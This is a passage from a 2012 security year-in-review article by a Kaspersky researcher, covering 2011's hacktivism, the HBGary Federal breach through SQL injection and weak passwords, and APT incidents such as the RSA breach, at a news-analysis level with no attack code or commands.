2011: An explosive year in security

By Costin Raiu, Director of Kaspersky Lab's Global Research & Analysis Team | Jan 10, 2012

If we had to summarize the year in security in a single word, I think it would have to be “explosive.” The multitude of incidents, stories, facts, new trends and intriguing actors is so big that it makes it very hard to come up with a top 10 of security stories of 2011.

What I was aiming for with this list was to remember the stories that also indicated major trends or the emergence of new major actors on the security scene. By looking at these stories, we can get an idea of what will happen in 2012.

1. The rise of “hacktivism”

It’s difficult to imagine someone reading this list who has not yet heard of Anonymous, LulzSec, and maybe TeaMp0isoN. Throughout 2011 these groups together with others were actively involved in various operations against law enforcement agencies, banks, governments, security companies and major software vendors.

Sometimes working together, in other cases working against each other, these groups emerged as one of the main groups of actors of 2011, through incidents such as security breaches of networks belonging to the United Nations, security intelligence firm Stratfor, FBI contractor IRC Federal, US Defense contractor ManTech, and the CIA. Interestingly, some of these incidents, such as the Stratfor hack, revealed major security problems such as the storing of CVV numbers in unencrypted format, or extremely weak passwords used by administrators.

Overall, the rise of hacktivism was one of the major trends of 2011, and no doubt it will continue in 2012 with similar incidents.

2. The HBGary Federal Hack

Although related to the first item on this list, I’d like to point this one out as a separate story. In January 2011, hackers from the Anonymous hacker collective broke into HBGary Federal’s webserver – hbgaryfederal.com – through an SQL injection attack. They were able to extract several MD5 hashes for passwords belonging to the company CEO, Aaron Barr, and COO, Ted Vera.

Unfortunately, both used passwords that were very simple: six lowercase letters and two numbers. These passwords allowed the attackers to get access to the company’s research documents and tens of thousands of mails stored on Google Apps.

I believe this story is relevant because it demonstrates an interesting situation – the use of weak passwords together with old software systems plus use of the cloud can turn into a security nightmare. If the CEO and COO had used strong passwords, none of this would likely have happened.

Or, if they’d had multi-factor authentication enabled on Google Apps, the attackers wouldn’t have been able to access the superuser account and copy all the company e-mails. It’s important to point out that even if better security measures had been in place, we can’t rule out the possibility that the ever-persistent hackers wouldn’t have found another way in. Persistence and determination, combined with plenty of time, gives the attackers the upper hand.

3. The advanced persistent threat

Although many security experts despise this term, it has made its way into the media and rocketed to super-popularity with incidents such as the RSA security breach or the imposingly entitled incidents such as operations Night Dragon, Lurid and Shady Rat.

Interestingly, many of these operations were not too advanced at all. On the other hand, there were many cases in which zero-day exploits were used, such as in the RSA breach. In this case, the attackers took advantage of CVE-2011-0609 – a vulnerability in Adobe Flash Player – to run malicious code on the target machine. Another interesting zero-day was CVE-2011-2462, a vulnerability in Adobe Reader, which was used in targeted attacks against U.S. Defense contractor ManTech.

Several things stand out in these attacks: Many cases involved zero-day vulnerabilities in Adobe software; many of these attacks were directed at U.S. targets, notably companies working with the U.S. military or government; the Lurid attack was interesting because it mainly targeted countries in Eastern Europe such as Russia or CIS countries. These attacks confirm the emergence of powerful nation-state actors and the establishment of cyber-espionage as common practice.

Additionally, many of these attacks seemed to be interconnected and have major global ramifications. For instance, the RSA breach was notable because the attackers stole the database of SecurID tokens, which was later used in another high-profile attack.